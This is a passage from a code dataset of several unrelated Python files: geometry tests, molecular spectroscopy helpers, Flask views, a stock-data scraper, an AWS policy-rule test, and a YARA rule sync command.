self.assertAlmostEqual(p[2].x, -1, 0.001)\r\n self.assertAlmostEqual(p[2].y, 1, 0.001)\r\n self.assertAlmostEqual(p[3].x, -1, 0.001)\r\n self.assertAlmostEqual(p[3].y, -1, 0.001)\r\n\r\n def testConversion(self):\r\n p = self.p.copy()\r\n self.assertEqual(list(p), p)\r\n self.assertTrue(isinstance(list(p), list))\r\n self.assertEqual(tuple(p), p)\r\n self.assertTrue(isinstance(tuple(p), tuple))\r\n\r\n def testPickle(self):\r\n testrect = flamingo.flmath.Rect((-1, 1), 2, 2)\r\n testrect_str = pickle.dumps(testrect)\r\n loaded_rect = pickle.loads(testrect_str)\r\n self.assertEqual(testrect, loaded_rect)\r\n\r\n def testBad(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError, flamingo.flmath.Rect, b)\r\n\r\n\r\n##-------- Test Suite\r\ntestpow = unittest.TestLoader().loadTestsFromTestCase(TestPow)\r\ntestdistance = unittest.TestLoader().loadTestsFromTestCase(TestDistance)\r\ntestmidpoint = unittest.TestLoader().loadTestsFromTestCase(TestMidpoint)\r\ntestarea = unittest.TestLoader().loadTestsFromTestCase(TestArea)\r\ntestnormalized = unittest.TestLoader().loadTestsFromTestCase(TestNormalizeAngle)\r\ntestnormalizepoly = unittest.TestLoader().loadTestsFromTestCase(TestNormalizePoly)\r\ntestsimplify = unittest.TestLoader().loadTestsFromTestCase(TestPolySimplify)\r\ntestvector = unittest.TestLoader().loadTestsFromTestCase(TestVector)\r\ntestpolygon = unittest.TestLoader().loadTestsFromTestCase(TestPolygon)\r\ntestrect = unittest.TestLoader().loadTestsFromTestCase(TestRect)\r\n\r\ntestsuite = unittest.TestSuite((testpow, testdistance, testmidpoint, testarea,\r\n testnormalized, testnormalizepoly, #testsimplify,\r\n testvector, testpolygon, testrect))\r\n\r\nif __name__ == \"__main__\":\r\n unittest.TextTestRunner(verbosity=2).run(testsuite)\r\n","sub_path":"tests/unit/flmath_test.py","file_name":"flmath_test.py","file_ext":"py","file_size_in_byte":25565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"509764202","text":"import numpy as np\nfrom configparser import ConfigParser\nimport ast\nimport matplotlib.pyplot as plt\n\nc = 299792458\nkB = 1.3806482e-23\nh_planck = 6.63607e-34\namu = 1.66e-27\n\n\ndef get_pop(J, B, T, N0 = 1):\n # returns rotational population distribution\n\n pop = N0 * (2*J+1) * np.exp(-B * h_planck * J*(J+1)/(kB*T))\n\n return pop / (np.sqrt(kB*T/(2*h_planck*B)) - 1.0/2.0)\n\ndef get_doppler(T, f0):\n # returns Doppler width for 27Al35Cl\n\n return np.sqrt(8*kB*T*np.log(2)/((35+27)*amu*c**2)) * f0\n\n\ndef simple_gauss(x, x0, A, w):\n return A * np.exp( -(x-x0)**2/(2*w**2) )\n\n\ndef av(arr, no_of_avg):\n # for 1D array\n if len(arr.shape)==1:\n hlp = np.zeros([int(arr.shape[0]/no_of_avg)])\n\n for k in range(len(hlp)):\n for m in range(no_of_avg):\n hlp[k] += arr[no_of_avg*k + m]\n\n return hlp/no_of_avg\n\n if len(arr.shape)==2: \n\n # for 2D array\n hlp = np.zeros([int(arr.shape[0]/no_of_avg), arr.shape[1]])\n\n for k in range(len(hlp)):\n for m in range(no_of_avg):\n hlp[k] += arr[no_of_avg*k + m, :]\n\n return hlp/no_of_avg\n\ndef read_in_config(f):\n \n config = ConfigParser()\n config.read(f)\n\n sensor_ids = config.sections()\n # make dictionary out of config\n\n sensors = {}\n\n for s in sensor_ids:\n opts = config.options(s)\n \n sensors[s] = {}\n for o in opts:\n sensors[s][o] = config.get(s, o)\n\n return sensors\n\ndef moving_average(a, n=3) :\n ret = np.cumsum(a, dtype=float)\n ret[n:] = ret[n:] - ret[:-n]\n return ret[n - 1:] / n\n\n\n\ndef scale_coeff(M, mass1, mass2, scale = True):\n\n # scale or unscale Dunham coefficients with the reduced mass\n mu = (mass1 * mass2)/(mass1 + mass2)\n\n if scale == False:\n \n # return U_kl = 1/mu^(-k/2 - l) * M_kl\n U = []\n for k in range(len(M)):\n hlp = []\n for l in range(len(M[k])):\n hlp.append(1.0/mu**(-k/2.0 - l) * M[k][l])\n U.append(hlp)\n \n return U\n else:\n\n # return Y_kl = mu^(-k/2 - l) * M_kl\n Y = []\n for k in range(len(M)):\n hlp = []\n for l in range(len(M[k])):\n hlp.append(mu**(-k/2.0 - l) * M[k][l])\n Y.append(hlp)\n \n return Y\n\n\ndef energy(Y, v, J):\n\n e = 0.0\n for k in range(len(Y)):\n for l in range(len(Y[k])):\n\n e += Y[k][l] * (v + 0.5)**k * ( J * (J + 1.0) )**l\n\n return e\n\ndef get_transitions(Yg, Ye, ve, vg, cnt_freq, df = 100e9, T = 10, Jmax = 1, no_of_points = 3000, real_amplitudes = True, pressure_broadening = 1.0, isotope_abundance = 1.0):\n\n Jg_arr = np.arange(0, Jmax+1) \n Je_arr = np.arange(1, Jmax+1)\n \n w = get_doppler(pressure_broadening * T, cnt_freq)\n \n nus = np.linspace(cnt_freq - df, cnt_freq + df, no_of_points)\n \n spectrum_P = np.zeros(len(nus))\n spectrum_Q = np.zeros(len(nus))\n spectrum_R = np.zeros(len(nus))\n \n f_P = []\n f_Q = []\n f_R = []\n \n for Jg in Jg_arr:\n for Je in Je_arr:\n \n # only dipole transitions\n eng = 100*c*(energy(Ye, ve, Je) - energy(Yg, vg, Jg))\n \n # apply population of ground states\n if real_amplitudes:\n A = get_pop(Jg, 100*c*Yg[0][1], T)\n else:\n A = 1.0\n\n\n if Je - Jg == -1: \n spectrum_P += simple_gauss(nus, eng, A, w)\n f_P.append(eng)\n #plt.plot( 2 * [(eng - 100*c*cnt_freq) / 1e9], [-0.1,0.0], 'r' )\n \n if Je - Jg == 0: \n spectrum_Q += simple_gauss(nus, eng, A, w)\n f_Q.append(eng)\n #plt.plot( 2 * [(eng - 100*c*cnt_freq) / 1e9], [-0.1,0.0], 'g' )\n \n if Je - Jg == +1: \n spectrum_R += simple_gauss(nus, eng, A, w)\n f_R.append(eng)\n #plt.plot( 2 * [(eng - 100*c*cnt_freq) / 1e9], [-0.1,0.0], 'b' )\n \n \n f_P = np.array(f_P)\n f_Q = np.array(f_Q)\n f_R = np.array(f_R)\n\n return (nus, [isotope_abundance * spectrum_P, isotope_abundance * spectrum_Q, isotope_abundance * spectrum_R], [f_P, f_Q, f_R])\n\ndef get_spec_lines(Yg, Ye, ve, vg, nus, line_type = 'Q', T = 1, Jmax = 1, real_amplitudes = True, cnt_freq = 100.0 * c * 38237.0):\n\n Jg_arr = np.arange(0, Jmax+1)\n Je_arr = np.arange(0, Jmax+1)\n \n w = get_doppler(T, cnt_freq)\n \n spectrum = np.zeros(len(nus))\n \n for Jg in Jg_arr:\n for Je in Je_arr:\n \n # only dipole transitions\n \n eng = 100*c*(energy(Ye, ve, Je) - energy(Yg, vg, Jg))\n \n # apply population of ground states\n if real_amplitudes:\n A = get_pop(Jg, 100*c*Yg[1][0], T)\n else:\n A = 1.0\n \n if Je - Jg == -1 and line_type == 'P': \n spectrum += simple_gauss(nus, eng, A, w)\n \n if Je - Jg == 0 and line_type == 'Q': \n spectrum += simple_gauss(nus, eng, A, w)\n \n if Je - Jg == +1 and line_type == 'R': \n spectrum += simple_gauss(nus, eng, A, w)\n \n \n\n return (nus, spectrum)\n\n\n\ndef plot_spectrum(nus, s, ve = 0, vg = 0, T = 0, cnt_freq = 0, style = '-', txt = '', abundance = 1.0):\n \n plt.plot( (nus - cnt_freq) / 1e9, abundance * s[0], 'r' + style, label = 'P' + txt)\n plt.plot( (nus - cnt_freq) / 1e9, abundance * s[1], 'g' + style, label = 'Q' + txt)\n plt.plot( (nus - cnt_freq) / 1e9, abundance * s[2], 'b' + style, label = 'R' + txt)\n\n plt.xlabel(\"Frequency (GHz) - {0:6.6f} THz\".format(cnt_freq/1e12))\n\n plt.title(\"AlCl transitions @ T = {2:2} K for v = {0} -> v' = {1} (J->J')\".format(vg, ve, T))\n\n plt.xlim(np.min(nus-cnt_freq)/1e9, np.max(nus-cnt_freq)/1e9)\n\n #plt.ylim(-0.1, 3.0)\n\n plt.legend()\n\ndef plot_transitions(f, cnt_freq = 0.0, cut = None, style = '-', txt = ''):\n \n if cut == None:\n cut = len(f[0])\n\n plt.plot((f[0][0:cut] - cnt_freq)/1e9, 'ro' + style, label = 'P' + txt)\n plt.plot((f[1][0:cut] - cnt_freq)/1e9, 'gx' + style, label = 'Q' + txt)\n plt.plot((f[2][0:cut] - cnt_freq)/1e9, 'bd' + style, label = 'R' + txt)\n\n plt.xlabel('Rotational number J')\n plt.ylabel(\"Frequency (GHz) - {0:6.6f} THz\".format(cnt_freq/1e12))\n\n plt.legend(loc = 'upper right')\n\n\n\ndef combine_data(x_arr, y_arr, arr = [], sort = True):\n\n # concatenates data arrays\n\n if len(arr) == 0:\n arr = range(len(x_arr))\n\n x = []\n y = []\n for n in arr:\n\n x.extend(x_arr[n])\n y.extend(y_arr[n])\n\n x = np.array(x)\n y = np.array(y)\n\n if sort:\n\n ind = np.argsort(x)\n\n x = x[ind]\n y = y[ind]\n\n return (x, y)\n\ndef get_reduced_dunham():\n\n # ground state from Bernath\n Ug = [\n #[0.0,3.59517408,-5.802142e-5],\n [0.0,3.711517408,-5.802142e-5],\n [1880.202,-9.575654e-2],\n [-32.012],\n [3.95186e-1],\n [-4.802e-3]\n ]\n \n # excited state\n Ue = [\n #[38251.101190451634 - (39.6e9+15.7e9-55.3e9)/100/c, 3.6400046656060443, 0.00], \n [38251.101190451634 - (39.6e9+15.7e9-55.3e9)/100/c, 3.695, 0.00], \n #[38237.483145, 3.64, 0.00], \n [1784.3665982617565, 0.0*-0.2344361133562231],\n [-114.5238709407005], \n [17.527497484431063], \n [-6.316749292366754]\n ]\n\n # these fit well for both transitions v=0 -> v=0 and v=1 -> v=1\n # they are far off from what Brian sees, though\n Ug = [[0, 3.697689639, -0.00004110220051, 0, 0, 0], [1880.20433, \\\n 0.04887253993, 0, 0, 0, 0], [-32.01271, 0, 0, 0, 0, 0], [0.0395499, \\\n 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0]]\n\n #Ue = [[38255.63489, 3.718219212, 0.00273806453, 0, 0, 0], [1729.598167, \\\n #-0.06421374131, 0, 0, 0, 0], [60.74391688, 0, 0, 0, 0, 0], \\\n #[-180.1417929, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, \\\n #0]]\n \n Ue = [\n [ 38254.32476191586,3.736511543882381 ],\n [ 1752.053766623087,-0.15954589427560947 ],\n [ -57.906191069099314 ],\n ]\n\n ## less orders\n #Ug = [[0, 3.703932569, -0.00004535349545], [1880.20433, 0, 0], \\\n #[-32.01271, 0, 0]]\n #Ue = [[38255.41096, 3.710086911, 0.002721267251], [1736.170635, 0, 0], [0, \\\n #0, 0]]\n\n #Ug = [[0, 3.058994665, -0.00008158000278], [1880.20433, 5.063896456, 0], \\\n #[-32.01271, 0, 0]]\n #Ue = [[38255.45438, 3.140849542, 0.002912864012], [1735.832448, \\\n #4.464122387, 0], [0, 0, 0]]\n\n return (Ug, Ue)\n\ndef get_dunham(Ug, Ue):\n\n massAl = 26.98153841\n massCl_35 = 34.96885269\n massCl_37 = 36.96590258\n\n # ground state\n Yg35 = scale_coeff(Ug, massAl, massCl_35, scale = True)\n Yg37 = scale_coeff(Ug, massAl, massCl_37, scale = True)\n\n # excited state\n Ye35 = scale_coeff(Ue, massAl, massCl_35, scale = True)\n Ye37 = scale_coeff(Ue, massAl, massCl_37, scale = True)\n\n return (Yg35, Ye35, Yg37, Ye37)\n\n\n\ndef read_in_data(data, offset_avg = 10, datafolder = '/Users/boerge/Software/offline_data/', moving_avg_no = 0):\n \n basefolder = str(data['date'])\n\n basefilename = datafolder + basefolder + '/' + basefolder + '_'\n\n f_freqs = basefilename + str(data['time']) + '_set_points'\n f_act_freqs = basefilename + str(data['time']) + '_act_freqs'\n f_ch0 = basefilename + str(data['time']) + '_ch0_arr'\n f_ch1 = basefilename + str(data['time']) + '_ch1_arr'\n f_ch2 = basefilename + str(data['time']) + '_ch2_arr'\n f_ch3 = basefilename + str(data['time']) + '_ch3_arr'\n\n config_file = basefilename + str(data['time']) + '_conf'\n\n conf = read_in_config(config_file)\n\n print('Analyzing file ... ' + f_freqs)\n \n freqs = np.genfromtxt(f_freqs, delimiter=\",\")\n act_freqs = np.genfromtxt(f_act_freqs, delimiter=\",\")\n ch0 = np.genfromtxt(f_ch0, delimiter=\",\")\n ch1 = np.genfromtxt(f_ch1, delimiter=\",\")\n ch2 = np.genfromtxt(f_ch2, delimiter=\",\")\n ch3 = np.genfromtxt(f_ch3, delimiter=\",\")\n\n # get number of averages\n no_of_avg = int(len(freqs)/len(np.unique(freqs)))\n\n print('Found ' + str(no_of_avg) + ' averages.')\n\n # take the averages\n freqs = av(freqs, no_of_avg)\n act_avg_freqs = av(act_freqs, no_of_avg)\n ch0 = av(ch0, no_of_avg)\n ch1 = av(ch1, no_of_avg)\n ch2 = av(ch2, no_of_avg)\n ch3 = av(ch3, no_of_avg)\n\n # subtracting the DC offset\n offset_avg_points = offset_avg\n for k in range(ch0.shape[0]):\n ch0[k, :] = ch0[k, :] - np.mean(ch0[k, -offset_avg_points:-1])\n ch1[k, :] = ch1[k, :] - np.mean(ch1[k, -offset_avg_points:-1])\n ch2[k, :] = ch2[k, :] - np.mean(ch2[k, -offset_avg_points:-1])\n ch3[k, :] = ch3[k, :] - np.mean(ch3[k, -offset_avg_points:-1])\n\n # get frequency scan interval in terms of absolute frequencies\n laser_offset = 3.0 * np.float(conf['offset_laser1']['val']) * 1e12\n\n act_freqs = 3.0 * act_freqs * 1e12\n act_avg_freqs = 3.0 * act_avg_freqs * 1e12\n freqs = 3.0 * freqs * 1e6\n \n # UV frequency = 3x IR frequency\n freqs = freqs + laser_offset\n\n t_steps = np.float(conf['step_size']['val'])*1e-6\n\n t_count = np.float(conf['scope_count']['val'])\n\n times = np.linspace(0, t_steps * t_count, np.int(t_count))\n\n times = times / 1e-3\n \n # apply moving time average \n if moving_avg_no > 0:\n \n times = moving_average(times, n = moving_avg_no)\n\n ch0_avg = np.zeros([ch0.shape[0], len(times)])\n ch1_avg = np.zeros([ch1.shape[0], len(times)])\n ch2_avg = np.zeros([ch2.shape[0], len(times)])\n ch3_avg = np.zeros([ch3.shape[0], len(times)])\n \n for k in range(ch0.shape[0]):\n ch0_avg[k, :] = moving_average(ch0[k, :], n = moving_avg_no)\n ch1_avg[k, :] = moving_average(ch0[k, :], n = moving_avg_no)\n ch2_avg[k, :] = moving_average(ch0[k, :], n = moving_avg_no)\n ch3_avg[k, :] = moving_average(ch0[k, :], n = moving_avg_no)\n\n return (times, freqs, act_freqs, act_avg_freqs, [ch0_avg, ch1_avg, ch2_avg, ch3_avg], laser_offset)\n\n else:\n \n return (times, freqs, act_freqs, act_avg_freqs, [ch0, ch1, ch2, ch3], laser_offset)\n\n\n\ndef print_dunham():\n\n (Ug, Ue) = get_reduced_dunham()\n \n (Yg35, Ye35, Yg37, Ye37) = get_dunham(Ug, Ue)\n \n\n print('Dunham coefficients')\n print('-'*30)\n #for v in range(len(Yg35)):\n # for l in range(len(Yg35[v])):\n\n print(\"Yg35_00 = {0:8.3f} THz\".format(Yg35[0][0]*100*c/1e12))\n print(\"Yg35_01 = {0:8.3f} GHz\".format(Yg35[0][1]*100*c/1e9))\n print(\"Yg35_02 = {0:8.3f} kHz\".format(Yg35[0][2]*100*c/1e3))\n print(\"Yg35_10 = {0:8.3f} THz\".format(Yg35[1][0]*100*c/1e12))\n print(\"Yg35_20 = {0:8.3f} GHz\".format(Yg35[2][0]*100*c/1e9))\n print(\"Yg35_11 = {0:8.3f} MHz\".format(Yg35[1][1]*100*c/1e6))\n print()\n print(\"Ye35_00 = {0:8.3f} THz\".format(Ye35[0][0]*100*c/1e12))\n print(\"Ye35_01 = {0:8.3f} GHz\".format(Ye35[0][1]*100*c/1e9))\n print(\"Ye35_02 = {0:8.3f} kHz\".format(Ye35[0][2]*100*c/1e3))\n print(\"Ye35_10 = {0:8.3f} THz\".format(Ye35[1][0]*100*c/1e12))\n print(\"Ye35_20 = {0:8.3f} GHz\".format(Ye35[2][0]*100*c/1e9))\n print(\"Ye35_11 = {0:8.3f} MHz\".format(Ye35[1][1]*100*c/1e6))\n\n\n\n\ndef print_matrix(U, txt = None):\n\n if not txt is None:\n print(txt + ' = [')\n else:\n print('[')\n for k in range(len(U)):\n print(U[k], end = '')\n #for l in range(len(U[k])):\n # print(U[k][l])\n if k < len(U):\n print(',')\n\n print(']\\n')\n \n\n\n","sub_path":"boerge/Spectroscopy_Paper_Analysis/v11/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":13614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"440548678","text":"# coding=utf-8\n\"\"\"\nLogic for dashboard related routes\n\"\"\"\nfrom flask import Blueprint, render_template, flash, redirect, url_for, escape\nfrom .forms import LogUserForm, AddUserForm, AddPostFrom\nfrom ..data.database import db\nfrom ..data.models import LogUser, Posts, Uzivatel\nblueprint = Blueprint('public', __name__)\n\n\n\n\n@blueprint.route('/', methods=['GET'])\n\ndef index():\n return render_template('public/index.tmpl', title='Home')\n\n\n\n@blueprint.route('/loguserinput',methods=['GET', 'POST'])\ndef InsertLogUser():\n form = LogUserForm()\n if form.validate_on_submit():\n LogUser.create(**form.data)\n return render_template(\"public/LogUser.tmpl\", form=form)\n\n@blueprint.route('/loguserlist',methods=['GET'])\ndef ListuserLog():\n pole = db.session.query(LogUser).all()\n return render_template(\"public/listuser.tmpl\",data = pole)\n\n@blueprint.route('/form', methods=['GET', 'POST'])\ndef InsertAddUser():\n form = AddUserForm()\n if form.validate_on_submit():\n Uzivatel.create(**form.data)\n flash(\"Data uspesne pridana!\", 'info')\n return redirect(url_for('public.render'))\n return render_template(\"public/addUser.tmpl\", form=form)\n\n@blueprint.route('/render')\ndef render():\n zaznamy = Uzivatel.listall()\n return render_template(\"public/vypis.tmpl\", data = zaznamy)\n\n@blueprint.route('/addPost/', methods=['GET', 'POST'])\ndef InsertAddPost(rodic):\n form = AddPostFrom()\n pole=db.session.query(Uzivatel).filter(Uzivatel.id==rodic).first()\n\n if form.validate_on_submit():\n if pole:\n form.user_id.data=rodic\n Posts.create(**form.data)\n flash(\"Data uspesne pridana!\", \"info\")\n else:\n flash(\"Data nepridabna uz!\", \"error\")\n\n return redirect(url_for('public.renderPost(1000)'))\n return render_template(\"public/add.tmpl\", form=form)\n\n#@blueprint.route('/posts')\ndef renderPost(id):\n zaznamy = Uzivatel.listpostall('Franta')\n #zaznamy = Prvni.all()\n return render_template(\"public/posts.tmpl\", data = zaznamy)\n\n","sub_path":"src/public/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"61730381","text":"import os\nimport shlex\nimport shutil\nimport crop_resize_faces\nimport original\nimport synthetic\nimport running_total\nimport time\nimport appscript\n\n#Clear screen and open Photo Booth app, wait to take picture\nos.system('clear')\nos.system('osascript -e \\\"tell application \\\\\\\"Photo Booth\\\\\\\" to activate\\\"')\ntime.sleep(10)\n\n#Close Photo Booth app (to ensure photos are deleted from display)\nos.system('osascript -e \\'quit app \\\"Photo Booth\\\"\\'')\n\n#Move photo into directory and pre-process\npath1 = \"Pictures/Photo Booth Library/Pictures/\"\npath2 = \"Documents/College/Senior Year/Fall/FURI/presentation/photo.jpg\"\nusr = \"../../../../../../\"\nfiles = os.listdir(usr + path1)\nshutil.move(usr+path1+files[0], usr + path2)\ncrop_resize_faces.main()\n\n#Run on original classifier and update totals\nprint(\"Original data:\")\nresult = original.main()\nif result:\n\trunning_total.og_f_eng()\nelse:\n\trunning_total.og_f_noneng()\n\n#Run on augmented classifier and update totals\nprint(\"Synthetic data:\")\nresult = synthetic.main()\nif result:\n\trunning_total.aug_f_eng()\nelse:\n\trunning_total.aug_f_noneng()\n\n#Display totals in new window\n#appscript.app('Terminal').do_script('cd Documents/College/Senior\\ Year/Fall/FURI/presentation/ && python running_total.py')\n\n\n","sub_path":"f_run_image.py","file_name":"f_run_image.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"471006487","text":"# coding=utf-8\n\nimport re\nfrom lxml import etree\nimport requests\nimport time\nfrom multiprocessing.dummy import Pool as ThreadPool\nimport json\nimport sys\nimport re\nimport os\nimport copy\nimport time\n\nimport Stocks\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nclass THSBillboard:\n def __init__(self):\n self.Url = \"http://data.10jqka.com.cn/market/lhbcjmx/code/%s\"\n\n def Spider(self, code, fileName):\n html = requests.get(self.Url%code)\n bDate = time.strptime('2015-01-01','%Y-%m-%d')\n if (html != None):\n dates = self.GetDates(html)\n if(dates != None):\n for date in dates:\n dDate = time.strptime(date,'%Y-%m-%d')\n\n if(dDate < bDate):\n continue\n\n url = self.Url%code + \"/date/%s/ajax/1\"%date\n html = requests.get(url)\n if(html != None):\n data = self.Parse(html, date)\n if(data != None):\n self.WriteCSV(data, code, fileName)\n\n\n def Parse(self, html, date):\n selector = etree.HTML(html.text)\n data = self.GetBlockTrade(selector, date)\n return data\n\n\n def GetDates(self, html):\n dates = []\n selector = etree.HTML(html.text)\n pattern = '/html/body/div[2]/div[5]/div/select/option'\n trSelector = selector.xpath(pattern)\n\n for item in trSelector:\n if(trSelector != None and len(trSelector) > 0):\n st = item.xpath('string()')\n if(st != None):\n dates.append(st)\n return dates\n\n\n def GetBlockTrade(self, selector, date):\n divPatterns = \"//div[@class='lhb_rank_list']\"\n divSelector = selector.xpath(divPatterns)\n\n pattern = u\"】(.*?)$\"\n\n data = []\n for item in divSelector:\n partSelector = item.xpath(\"div[@class='jj_ggcjmx_title']\")\n title = partSelector[0].xpath('string()').replace('\\n','').replace('\\t','').replace(',','').replace('\\r','').strip()\n titleType = re.findall(pattern, title)[0]\n trPattern = 'table/tbody/tr'\n trs = item.xpath(trPattern)\n noOne = 0\n for i in range(0, len(trs)):\n row = []\n tdSelectors = trs[i].xpath(\"td\")\n if(len(tdSelectors) == 1):\n continue\n j = 0\n row.append(date)\n row.append(titleType)\n for j in range(0, len(tdSelectors)):\n st = tdSelectors[j].xpath('string()')\n if(st != None):\n st = st.replace('\\n','').replace('\\t','').replace(',','').replace('\\r','').replace(' ','').strip()\n if(j==0):\n if(st == '1'):\n noOne = noOne + 1\n if(noOne == 2):\n st = '-' + st\n if(j == 1):\n strs = re.findall(\"\\d+(.*?)$\", st)\n if(len(strs) > 0):\n st = strs[0]\n row.append(st)\n data.append(row)\n return data\n\n def WriteCSV(self, data, code, fileName):\n with open(fileName, \"a\") as fileStock:\n for row in data:\n fileStock.write(\"%s,%s\"%(\"同花顺\", code))\n for item in row:\n fileStock.write(\",%s\"%item)\n fileStock.write(\"\\n\")\n fileStock.flush()\n\n\nif __name__ == '__main__':\n #codes = Stocks.StockList.GetStockCodes()\n codes = ['000058']\n\n fileName = u\"d://股价异动_同花顺.csv\"\n\n if os.path.exists(fileName):\n os.remove(fileName)\n\n startTime = time.time()\n\n ths = THSBillboard()\n for code in codes:\n ths.Spider(code, fileName)\n print(\"%s:OK\"%code)\n\n endTime = time.time()\n print(\"单线程时间%.2f秒\"%(endTime - startTime))","sub_path":"Data/Billboard.py","file_name":"Billboard.py","file_ext":"py","file_size_in_byte":4026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"64232431","text":"import os\nimport sys\n\npath_prepend = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(os.path.join(path_prepend))\nfrom base.splunk_handler import SplunkOutputHandler\n\n\ndef test_stream_output():\n handler = SplunkOutputHandler('https://systest-auto-master:8089', 'admin', 'changed', 'main', 'aaa', 'bbb')\n handler.set_flush_threshold(15)\n for i in range(10):\n handler.stream_event('I am {0}'.format(str(i)))\n\n\nif __name__ == '__main__':\n test_stream_output()\n","sub_path":"test/test_splunk_handler.py","file_name":"test_splunk_handler.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"443766310","text":"\"\"\"\nCopyright 2018-2020 Skyscanner Ltd\n\nLicensed under the Apache License, Version 2.0 (the \"License\"); you may not use\nthis file except in compliance with the License.\nYou may obtain a copy of the License at\n\nhttp://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software distributed\nunder the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR\nCONDITIONS OF ANY KIND, either express or implied. See the License for the\nspecific language governing permissions and limitations under the License.\n\"\"\"\nfrom pytest import fixture\n\nfrom cfripper.rules import PartialWildcardPrincipalRule\nfrom tests.utils import get_cfmodel_from\n\n\n@fixture()\ndef good_template():\n return get_cfmodel_from(\"rules/PartialWildcardPrincipalRule/good_template.json\").resolve()\n\n\n@fixture()\ndef bad_template():\n return get_cfmodel_from(\"rules/PartialWildcardPrincipalRule/bad_template.json\").resolve()\n\n\ndef test_no_failures_are_raised(good_template):\n rule = PartialWildcardPrincipalRule(None)\n result = rule.invoke(good_template)\n\n assert result.valid\n assert len(result.failed_rules) == 0\n assert len(result.failed_monitored_rules) == 0\n\n\ndef test_failures_are_raised(bad_template):\n rule = PartialWildcardPrincipalRule(None)\n result = rule.invoke(bad_template)\n\n assert result.valid\n assert len(result.failed_rules) == 0\n assert len(result.failed_monitored_rules) == 4\n assert result.failed_monitored_rules[0].rule == \"PartialWildcardPrincipalRule\"\n assert result.failed_monitored_rules[0].reason == \"PolicyA contains an unknown principal: 123445\"\n assert result.failed_monitored_rules[1].rule == \"PartialWildcardPrincipalRule\"\n assert (\n result.failed_monitored_rules[1].reason\n == \"PolicyA should not allow wildcard in principals or account-wide principals \"\n \"(principal: 'arn:aws:iam::123445:12345*')\"\n )\n assert result.failed_monitored_rules[2].rule == \"PartialWildcardPrincipalRule\"\n assert result.failed_monitored_rules[2].reason == \"PolicyA contains an unknown principal: 123445\"\n assert result.failed_monitored_rules[3].rule == \"PartialWildcardPrincipalRule\"\n assert (\n result.failed_monitored_rules[3].reason\n == \"PolicyA should not allow wildcard in principals or account-wide principals \"\n \"(principal: 'arn:aws:iam::123445:root')\"\n )\n","sub_path":"tests/rules/test_PartialWildcardPrincipal.py","file_name":"test_PartialWildcardPrincipal.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"29879415","text":"class Solution(object):\n def productExceptSelf(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n n = len(nums)\n p = 1\n result = []\n result.append(p)\n # from 1 to n -1\n for i in range (1, n):\n result.append(p * nums[i - 1])\n p = p * nums[i - 1]\n # from n - 2 to 0\n p = 1\n for i in range(n - 1, -1, -1):\n result[i] = p * result[i]\n p = p * nums[i]\n return result\n","sub_path":"product_array_except_self.py","file_name":"product_array_except_self.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"413987198","text":"import git\nimport requests\nimport marko\nimport yara\nfrom pathlib import Path\nfrom git import Repo\nfrom bs4 import BeautifulSoup\nfrom django.db import transaction\nfrom django.conf import settings\n\nfrom django.core.management.base import BaseCommand\nfrom django.contrib.auth import get_user_model\nfrom orochi.ya.models import Ruleset, Rule\n\nfrom multiprocessing.dummy import Pool as ThreadPool\n\n\nclass Command(BaseCommand):\n help = \"Sync Yara Rules\"\n\n def __init__(self, *args, **kwargs):\n super(Command, self).__init__(*args, **kwargs)\n self.updated_rules = []\n\n def compile_rule(self, item):\n \"\"\"\n Check if single rule is valid\n \"\"\"\n path, ruleset_pk = item\n ruleset = Ruleset.objects.get(pk=ruleset_pk)\n rule, _ = Rule.objects.get_or_create(path=path, ruleset=ruleset)\n compiled = False\n # TRY LOADING COMPILED, IF FAILS TRY LOAD\n try:\n _ = yara.load(str(path))\n compiled = True\n self.stdout.write(\"\\t\\tCOMPILED\")\n except yara.Error:\n try:\n _ = yara.compile(str(path), includes=False)\n except yara.SyntaxError as e:\n self.stdout.write(\n self.style.ERROR(\"\\t\\tCannot load rule {}!\".format(path))\n )\n self.stdout.write(\"\\t\\t\\t{}\".format(e))\n rule.enabled = False\n rule.compiled = compiled\n rule.save()\n\n def down_repo(self, item):\n \"\"\"\n Clone or pull remote repos\n \"\"\"\n rulesetpath, rulesetname, description = item\n ruleset, created = Ruleset.objects.update_or_create(\n name=rulesetname, url=rulesetpath, defaults={\"description\": description}\n )\n\n repo_local = \"{}/{}\".format(\n settings.LOCAL_YARA_PATH, ruleset.name.lower().replace(\" \", \"_\")\n )\n\n if created or not ruleset.cloned:\n # GIT CLONE\n try:\n repo = Repo.clone_from(\n ruleset.url,\n to_path=repo_local,\n )\n self.stdout.write(\"\\tRepo {} cloned\".format(ruleset.url))\n ruleset.cloned = True\n ruleset.save()\n self.updated_rules += [\n (x, ruleset.pk)\n for x in Path(repo_local).glob(\"**/*\")\n if x.suffix.lower() in settings.YARA_EXT\n ]\n except git.exc.GitCommandError as e:\n self.stdout.write(self.style.ERROR(\"\\tERROR: {}\".format(e)))\n ruleset.enabled = False\n ruleset.save()\n else:\n # GIT UPDATE\n try:\n repo = Repo(repo_local)\n origin = repo.remotes.origin\n current_hash = 